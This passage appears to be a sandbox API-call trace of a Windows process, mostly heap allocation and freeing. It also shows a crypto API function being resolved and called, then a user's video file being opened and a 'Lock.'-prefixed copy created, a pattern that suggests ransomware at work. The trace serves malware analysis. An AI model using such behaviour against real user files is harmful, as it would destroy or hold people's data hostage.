hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.402] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.402] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.402] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.402] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.403] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.403] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0258.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0258.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.404] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0258.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.405] CryptDestroyHash (hHash=0xaa5760) returned 1 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0258.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0258.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.408] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0258.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0258.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0258.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0258.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.412] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.412] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.412] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.412] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.412] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EseSTJL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\esestjl.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0258.413] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0258.413] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0258.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0258.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.413] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0258.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0258.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0258.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0258.413] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.EseSTJL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.esestjl.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0258.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0258.414] 